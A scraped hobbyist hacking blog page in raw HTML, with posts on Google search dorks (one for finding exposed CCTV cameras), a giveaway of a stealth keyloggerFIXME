src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUdhkvW8NPhqIjWjhRVMeC4P8Om8loQvmA1BhtwEH9D-Imv0YVaENTXPKpR46WqEJ7czcdEQ9j4fuKNUgOo84kofLzpdjmdQpjLhW1WrTgCFJlEJdyu8m3ThKu63-HuxxFiBoodABDGNnk/s320/gh5.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> <br />Google keeps snapshots of pages it has crawled that we can access via the Cached link on the search results page.<br />"Google hacking" involves using Advance Search Operators in the Google search engine to locate specific strings of text within search results.<br /> Some of the more popular examples are finding specific versions of Vulnerable Web Applications.<br />You can look for the particular Filetypes, Password files and Directories.<br />You can even find out the IP based CCTV Cameras.<br /><br /><span class="Apple-style-span" style="color: red;"><b>How can we use google to hack!!!</b></span><br /><br />Search using some keywords like 'intitle','Filetype','site','Inurl'...<br /><br />For example:<br />Intitle:hackinginception --> searches for all the website links which have "hackinginception" in their titles<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_gb6CwCzUnC_BQEy7nHFQ5EjQV41sIDZx02v4szchnA-aUmGc_fdks5GpWS2BlYgw0OCUnHz5GI3Y9rm1_OMnIZFYqYzqJNXtze9-Tn_l7EBeSZ-sgekO1PXuwxILvspaqGCjoMh0YXS/s1600/gh1.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9_gb6CwCzUnC_BQEy7nHFQ5EjQV41sIDZx02v4szchnA-aUmGc_fdks5GpWS2BlYgw0OCUnHz5GI3Y9rm1_OMnIZFYqYzqJNXtze9-Tn_l7EBeSZ-sgekO1PXuwxILvspaqGCjoMh0YXS/s400/gh1.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br />Filetype:doc intitle:"security" --> searches for all website links which contain the MS word documents.<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih38GtV5JkIwN0ZSVTbNoBsYaQuZu4Vn2TQCQd3eI_e-86ss5RkIoJ7coB16YmCDKY4_rtS38KzByVG6mTRQlG-4QvoYWfQr-ze6ld6mEiGz5KZ9hEzsGJWj4IvHOjGOePLqt-jHaXBAZc/s1600/gh2.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEih38GtV5JkIwN0ZSVTbNoBsYaQuZu4Vn2TQCQd3eI_e-86ss5RkIoJ7coB16YmCDKY4_rtS38KzByVG6mTRQlG-4QvoYWfQr-ze6ld6mEiGz5KZ9hEzsGJWj4IvHOjGOePLqt-jHaXBAZc/s400/gh2.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br />site:hackinginception.blogspot.com --> searches for webpages only from the website<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzgNO3JR-JZ-l9JT3CR67RyaXza9__Eh0v6YEmOi3OPQ_adK-YraiMs-cX5mxVOsFCE9ml3HBgOVx117qL-1zEaZqpmbxfYJtYvYAo8Aw7pqOJPRxlUnXoEegrMMZ2JeGmaUcGTzvNw_L/s1600/gh3.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixzgNO3JR-JZ-l9JT3CR67RyaXza9__Eh0v6YEmOi3OPQ_adK-YraiMs-cX5mxVOsFCE9ml3HBgOVx117qL-1zEaZqpmbxfYJtYvYAo8Aw7pqOJPRxlUnXoEegrMMZ2JeGmaUcGTzvNw_L/s400/gh3.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br />Inurl:indexframe.shtml --> searches the links for the CCTV cameras all around the world<br /><br /><span id="goog_492266027"></span><span id="goog_492266028"></span><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwEnkCBNJNomXJNbcoCuOstWcFQp8tRUSECq4TkWolrDIYlz2Aew4mi63wG7Cz8h7uaAglimHxpt4m7To621T-9XsZ-vJFSmslnJWoEaCtYZjuc4qOFpurF9kovMkCm2i1w3DNVoOa8FN/s1600/gh.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLwEnkCBNJNomXJNbcoCuOstWcFQp8tRUSECq4TkWolrDIYlz2Aew4mi63wG7Cz8h7uaAglimHxpt4m7To621T-9XsZ-vJFSmslnJWoEaCtYZjuc4qOFpurF9kovMkCm2i1w3DNVoOa8FN/s400/gh.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <br /><br />In this way, you can try different combinations and hack using google search!!!<br />You can also find websites that are vulnerable using google hacking!!!<br /><br /><b><span class="Apple-style-span" style="color: red;">About the author:</span></b><b><span class="Apple-style-span" style="color: red;"> </span></b>This is a guest post by <b><span class="Apple-style-span" style="color: blue;">ANUSHA MANNE</span> </b>who is interested in new technologies and wants to share knowledge with my blog readers. Usually writes articles related to<span class="Apple-style-span" style="color: blue;"><b> latest technologies</b></span> at <span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px;"><b style="border: 0px; color: #0033cc;"><a href="http://www.anushamanne.blogspot.com/" style="border: 0px; color: #0033cc; text-decoration: none;">Techie Talk</a></b></span><br /><div> <span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px;"><br /></span></div> <div> Hope you liked it. If you have any queries or suggestions, leave a comment.</div> </div> </div> </div>

Hack using Google Search Engine

One of the ways to attack on webserver is " Google Hacking ". As we all know, Google is a Search Engine. Google keeps s...

Read more »

Win A Free Copy Of Winspy Keylogger

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on">    Recently the blog <a href="http://www.101hacker.com/2011/09/about-us.html" style="border: 0px; color: #0033cc; text-decoration: none;">Hackaholic</a> moved to custom domain 101hacker.com.<br /><br />To thank all the readers, the blog owner has decided to give away a copy of WinSpy Keylogger worth 39.95$ to 3 Lucky Winners.<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJzthw1MBG8Ilw3CkJ8vA0TUbuxGElVqN0b4Ym_DEhxU1K4r2RfVRPoAsCfFVdvNLcerMdsPqUzn0U3xKDU801frzYW5tEwFXdhNSgXqvQcqnI0ZQnz6C3hwHIBOOEy4k49MxAddkZBYsu/s1600/Winspy.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJzthw1MBG8Ilw3CkJ8vA0TUbuxGElVqN0b4Ym_DEhxU1K4r2RfVRPoAsCfFVdvNLcerMdsPqUzn0U3xKDU801frzYW5tEwFXdhNSgXqvQcqnI0ZQnz6C3hwHIBOOEy4k49MxAddkZBYsu/s1600/Winspy.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" /></a></div> Winspy is one of the best Keylogger recommend by many ethical hackers for hacking purposes.<br /><br />Winspy keylogger is a Complete Stealth Monitoring Package that can spy on both your Local PC and Remote PC.<br /> It includes Remote Install and Realtime Remote PC Viewer. Win Spy Software will capture anything the user sees or types on the keyboard.<br />A special hotkey is used to login and access the program. Users will not be able to terminate or uninstall Win-Spy.<br /><div> <div> Win-Spy Software operates in stealth mode. It will not appear in Windows Start, System Tray, Desktop, Task Manager or Add/Remove Programs.</div> <div> <br /></div> <div> <div> <b>Win Spy Features:</b></div> <div> Monitor Chat Room (dual side) and web activity</div> <div> Remote Monitor any Email</div> <div> Monitor Remote PC Webcam</div> <div> Its Totally Stealth (i.e) Totally undetectable</div> <div>      and many more.......</div> </div> </div> <div> <br /></div> <div> Read more at: <a href="http://www.101hacker.com/2011/10/win-free-copy-of-winspy-keylogger.html#ixzz1bR8roVzZ" style="border: 0px; color: #0033cc; text-decoration: none;">http://www.101hacker.com/2011/10/win-free-copy-of-winspy-keylogger.html#ixzz1bR8roVzZ</a></div> <div> <br /></div> <div> <div> To participate in the contest and win a free copy of Winspy Keylogger,</div> <div> <a href="http://www.101hacker.com/2011/10/win-free-copy-of-winspy-keylogger.html" style="border: 0px; color: #0033cc; text-decoration: none;">click here</a></div> <div> <br /></div> <div> Don't miss the opportunity!!!</div> </div> </div> </div> </div>

Win A Free Copy Of Winspy Keylogger

   Recently the blog  Hackaholic  moved to custom domain 101hacker.com. To thank all the readers, the blog owner has decided to giv...

Read more »

Gmail Privacy Attack

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpvrqZ2e8CfUC9i6XTeAhxNtvXrGxpJgCCj7EqHY1C0SKh65Nfwg0uhd4c8TUMfDVROIomHLGLJEQT-7pQRyV1ilbxoIH5dlUEOHBpAQOnenVL_XgwuQraVLkj8Yrt1B09JRe-dgvMQlW3/s1600/gmail-logo.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpvrqZ2e8CfUC9i6XTeAhxNtvXrGxpJgCCj7EqHY1C0SKh65Nfwg0uhd4c8TUMfDVROIomHLGLJEQT-7pQRyV1ilbxoIH5dlUEOHBpAQOnenVL_XgwuQraVLkj8Yrt1B09JRe-dgvMQlW3/s200/gmail-logo.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="200" /></a></div> <br />        You meet an old friend online on Gmail after a long time and you start chatting with that person.. and suddenly he/she says that they got to leave and goes offline...the chat box displays that the person is offline!!!<br />You are now left in a curiosity to know if that person had really signed out or just invisible!!!!<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowwJvFM9NibMXK5HXYVclWiDJzKIAAUwA_dDqR-mG3XaDAC4QHriQzE50CUlDyB2ptHNZVm6VmIV5QBnUZqFMOQsIqtHghlvlk8N_hrKN_RP_L_N6uUcHBIJxmlHMctyr7JDuLOB6pa0x/s1600/gm1.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgowwJvFM9NibMXK5HXYVclWiDJzKIAAUwA_dDqR-mG3XaDAC4QHriQzE50CUlDyB2ptHNZVm6VmIV5QBnUZqFMOQsIqtHghlvlk8N_hrKN_RP_L_N6uUcHBIJxmlHMctyr7JDuLOB6pa0x/s320/gm1.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="216" /></a></div> <br /><br />Heres how you can find out!!<br /><br />Whenever your friend leaves the chat and goes offline.... put the chat <span class="Apple-style-span" style="color: #660000;">off the record</span>...<br />This can be done by going under the<span class="Apple-style-span" style="color: #660000;"> Actions</span> panel on the right corner of your chat box.<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh80imB6o1ONj35B6vWmvSmPvVOybIksHlt3v6Z4VjNF81rlT63KNv43nnqebshc5-l6qCW9MOeAAbVi8QB-6CBc85rIAre8HhQKFLIykC6KpvF8sEAjtul7O65SddXG2Mpi7M0WOvGQUjZ/s1600/gm2.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh80imB6o1ONj35B6vWmvSmPvVOybIksHlt3v6Z4VjNF81rlT63KNv43nnqebshc5-l6qCW9MOeAAbVi8QB-6CBc85rIAre8HhQKFLIykC6KpvF8sEAjtul7O65SddXG2Mpi7M0WOvGQUjZ/s320/gm2.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> <br /><br />Next after receiving the notice send a message to that person.<br /><br />After sending a chat message, if it doesn't display anything that means the person is invisible and didn't really sign out!!!<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UQTFHFTz9aRFn7WAU_il2Qm44ZBXmN7jzBU8Me19EvjzWrN1I48dM4Eud_q5hdBzEuDFgPdon_gIoKuVgVzZljtNdN0EdoqJU5laG4bo-yNCM8sGrc44obojPYEgIn-K1kN5jClKhkaA/s1600/gm3.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UQTFHFTz9aRFn7WAU_il2Qm44ZBXmN7jzBU8Me19EvjzWrN1I48dM4Eud_q5hdBzEuDFgPdon_gIoKuVgVzZljtNdN0EdoqJU5laG4bo-yNCM8sGrc44obojPYEgIn-K1kN5jClKhkaA/s320/gm3.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="229" /></a></div> <br />And if the person really signed out of Gmail, then it displays a message "<span class="Apple-style-span" style="color: #660000;">[name] did not receive your chat</span>"...<br /><br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0P-efyN2su5z8WqRUZ-OVuH08-4HSq_oTpu_4yYQNeg0-IFk2kfv2SsAqcZPnchyi5ftp1TvwLLywx9psHuyVrrlUTvdrMASF3or4aIeWO-go3qrHEGUU-MJ0jRgwKJjEujmFzjRN_V4l/s1600/gm4.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0P-efyN2su5z8WqRUZ-OVuH08-4HSq_oTpu_4yYQNeg0-IFk2kfv2SsAqcZPnchyi5ftp1TvwLLywx9psHuyVrrlUTvdrMASF3or4aIeWO-go3qrHEGUU-MJ0jRgwKJjEujmFzjRN_V4l/s320/gm4.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="256" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> <span class="Apple-style-span" style="color: red;">Note</span>: Do it for fun!!!! Because its not a good thing to snoop around and keep disturbing the person who isn't interested in chatting with you.<br /><br /><b><span class="Apple-style-span" style="color: red;">About the author:</span></b><b><span class="Apple-style-span" style="color: red;"> </span></b>This is a guest post by <b><span class="Apple-style-span" style="color: blue;">ANUSHA MANNE</span> </b>who is interested in new technologies and wants to share knowledge with my blog readers. Usually writes articles related to<span class="Apple-style-span" style="color: blue;"><b> latest technologies</b></span> at <span class="Apple-style-span" style="font-family: arial, sans-serif; font-size: 13px;"><b style="border: 0px; color: #0033cc;"><a href="http://www.anushamanne.blogspot.com/" style="border: 0px; color: #0033cc; text-decoration: none;">Techie Talk</a></b></span></div> </div> </div>

Gmail Privacy Attack

        You meet an old friend online on Gmail after a long time and you start chatting with that person.. and suddenly he/she sa...

Read more »

An Introduction To Keyloggers

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhL-sZR9j10b3LCM3VcYrSfj5AkD7XQVjq0jKlIwh22X5z-KUuMet9-S1mAOILeFUbDmaRy554VCbD8RlPD_wlpYOTvRn14j83Qq_W6HoOshoedcNIafeWY757QGaX4IgWVQZerGLToP37/s1600/secure-keyloggers-hijackers.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhL-sZR9j10b3LCM3VcYrSfj5AkD7XQVjq0jKlIwh22X5z-KUuMet9-S1mAOILeFUbDmaRy554VCbD8RlPD_wlpYOTvRn14j83Qq_W6HoOshoedcNIafeWY757QGaX4IgWVQZerGLToP37/s320/secure-keyloggers-hijackers.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> <br /><b><span class="Apple-style-span" style="color: red; font-size: medium;">What are Keyloggers?</span></b><br /><b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b><br />keylogging is an act in which  every key stroke pressed by the user of a computer is recorded. keyloggers can perform many other things like taking screenshots,monitoring the system etc.<br /><br /><br /><b><span class="Apple-style-span" style="color: red; font-size: medium;">Types of keyloggers:</span></b><br /><b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b><br /><b><span class="Apple-style-span" style="color: red;">hardware keyloggers:</span></b><br /><br />Hardware Keyloggers are used for keystroke logging. These are used to capture user keystrokes. We plug them between a computer keyboard and a computer. It contains some internal memory to store the captured data. They are designed to work with PS/2 keyboards. Hardware keyloggers based on USB ports are also evolved recently.<br /><div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFN4i3aoOCzJ6R9rmY-JDz0BTTa9Tc87ji6AJz0ONQEUa6Kq1OPU4EN2ALrQJ4EeiwINSp37wvJbaUNtUreTkyTdrfWPgr5qDtgfO_Zr7kQBGKhRPPw44VMVD6SnE8Ltsn6Fo7kRH_NlYM/s1600/keyloggers.jpg" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFN4i3aoOCzJ6R9rmY-JDz0BTTa9Tc87ji6AJz0ONQEUa6Kq1OPU4EN2ALrQJ4EeiwINSp37wvJbaUNtUreTkyTdrfWPgr5qDtgfO_Zr7kQBGKhRPPw44VMVD6SnE8Ltsn6Fo7kRH_NlYM/s320/keyloggers.jpg" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="320" /></a></div> <br /><b><span class="Apple-style-span" style="color: red;">software keyloggers:</span></b><br /><br />These keyloggers are a type of malwares. These are of two types again. They are local and remote keyloggers.<br />Local keyloggers can be directly installed on a system to moniter its functionality.<br />where as a remote keylogger can monitor computer that is far away from us. So using this, you can monitor a computer from any wher in the world.<br /><br /><b><span class="Apple-style-span" style="color: red; font-size: medium;">Uses:</span></b><br /><b><span class="Apple-style-span" style="color: red; font-size: medium;"><br /></span></b><br />We can hack facebook,Gmail,orkut,yahoo accounts very easily with the keyloggers.<br />In organizations,people use them to monitor the employees activities.<br />Like this, it can be used for different purposes.<br /><br /><span class="Apple-style-span" style="color: red; font-size: medium;"><b>Which keylogger is the best?</b></span><br /><br /><span class="Apple-style-span" style="color: blue;">Sniperspy</span> is  a well known keylogger.  but its not free<br /><br /><span class="Apple-style-span" style="color: blue;">Ardamax keylogger</span> is a good working keylogger and it is free.<br /><br /><br />I will write articles on "How to hack facebook,gmail etc using keyloggers" very soon.<br /><br />Hope you liked it.Leave a comment if you have any doubts or suggestions.</div> </div> </div>

An Introduction To Keyloggers

What are Keyloggers? keylogging is an act in which  every key stroke pressed by the user of a computer is recorded. keyloggers ca...

Read more »

All about IP addresses

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7adfzNwUzAgu6NuCm4D0iOg1X7PiQOFsjNOl2EADw7-jLdYTOIjvUyMenOof2gxzwjL5MYhXxi0gY9OCOQUnGTbi6z9xgjUoi-u_FK9dp_6zvgfBNVT_AK1dHx7rwlH8KTsZ-s7PSJJBT/s1600/dns01.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7adfzNwUzAgu6NuCm4D0iOg1X7PiQOFsjNOl2EADw7-jLdYTOIjvUyMenOof2gxzwjL5MYhXxi0gY9OCOQUnGTbi6z9xgjUoi-u_FK9dp_6zvgfBNVT_AK1dHx7rwlH8KTsZ-s7PSJJBT/s400/dns01.png" style="background-color: #f3f3f3; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border-top-left-radius: 3px; border-top-right-radius: 3px; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 5px;" width="400" /></a></div> <div class="separator" style="clear: both; text-align: center;"> <br /></div> I feel that the first and foremost thing to learn hacking is to know about IP address. So i am starting my hacking related posts with IP address.<br />In this post i have written all the basic concepts of IP addresses.<br />My next post will be on hacking IP address of a remote computer.<br />So before that lets have a glance at the basics of IP..<br /><br /><br />What is an IP address?<br />If a post man wants to deliver a letter to you, first he needs to know the address of your home. In the same way Computers on the Internet need to find one another in order to communicate. Each computer therefore has a unique identifying number known as an IP address.<br />Simply.. Every system connected to internet must have a unique address. This address is called IP address.<br />Every URL (say, “www.google.com”) has its own numbered Internet Protocol or IP address.<br />An IP address looks something like this:74.125.19.147<br />An IP address is a series of numbers that tells us where a particular device is on the Internet network.<br /><br /><br /><b>Public IP address</b><br />A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.<br /><div> <br /></div> <div> Public IP addresses can be divided into two types.</div> <div> They are STATIC and DYNAMIC..</div> <div> <br /></div> <div> <div> <b>what is static IP?</b></div> <div> A static IP address does not change and is used primarily for hosting webpages or services on the Internet. </div> <div> <br /></div> <div> <b>Disadvantages of static configuration</b></div> <div> This requires manual configuration of each and every computer.</div> <div> Every time care must be taken that no two systems should have same IP.</div> <div> This manual configuration has many problems when number of systems increase.</div> </div> <div> <br /></div> <div> <div> <b>Dynamic IP</b></div> <div> On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.</div> <div> To do this Dynamic Host Configuration Protocol (<b><a href="http://en.wikipedia.org/wiki/Dynamic_Host_Configuration_Protocol" style="border: 0px; color: #0033cc; text-decoration: none;">DHCP</a></b>) was developed.</div> <div> A DHCP server is a software program that assigns IP addresses to computer dynamically.</div> <div> </div> <div> <b>Advantages</b></div> <div> Administrators of large networks save hundreds of hours per year over manual configuration of computers.</div> <div> No IP address conflict.</div> <div> Users need not know about manual configuration.</div> </div> <div> <br /></div> <div> <b>Private IP address</b></div> <div> <div> An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):</div> <div> <br /></div> <div> 10.0.0.0 – 10.255.255.255 (Total Addresses: 16,777,216)</div> <div> 172.16.0.0 – 172.31.255.255 (Total Addresses: 1,048,576)</div> <div> 192.168.0.0 – 192.168.255.255 (Total Addresses: 65,536)</div> </div> <div> <br /></div> <div> <div> <b>How to find your Private IP?</b></div> <div> go to start->open RUN->type cmd. Then command prompt will be opened->type the command "ipconfig" without brackets. </div> <div> The number that you see against “IPV4 Address:” is your private IP.</div> <div> <br /></div> <div> <b>How to find your public IP?</b></div> <div> You can check your public IP address by visiting <a href="http://www.whatismyip.com/" style="border: 0px; color: #0033cc; text-decoration: none;">www.whatismyip.com</a></div> </div> </div> </div> </div>

All about IP addresses

I feel that the first and foremost thing to learn hacking is to know about IP address. So i am starting my hacking related post...

Read more »

Youtube hack to watch 18+ videos

<div dir="ltr" style="text-align: left;" trbidi="on"> <div class="posthead" style="background-color: white; clear: left; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 12px; line-height: 17px; padding-top: 8px; position: relative;"> <h1 style="font-size: 20px; font-weight: normal; letter-spacing: -1px; line-height: 28px; margin: 0px; padding: 0px 0px 10px;"> <br /></h1> </div> <div style="background-color: white; clear: left; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> </div> <div class="post-body entry-content" style="background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 17px;"> <div dir="ltr" trbidi="on"> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8ZXKR8u823zp7LX2Ec2oN7D_cN2AK3ZhpzGlegjgwmgek8CgXq-7wHV3FkiH71WxogrgemjLAFP5STojQjlZIyyNnGbAvjaD9ZPmwhJgaX0z_flEeD9vIjtI0i-e7EIfJn4ngQMz_0Aw1/s1600/youtube_logo.png" imageanchor="1" style="border: 0px; color: #0033cc; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="240" 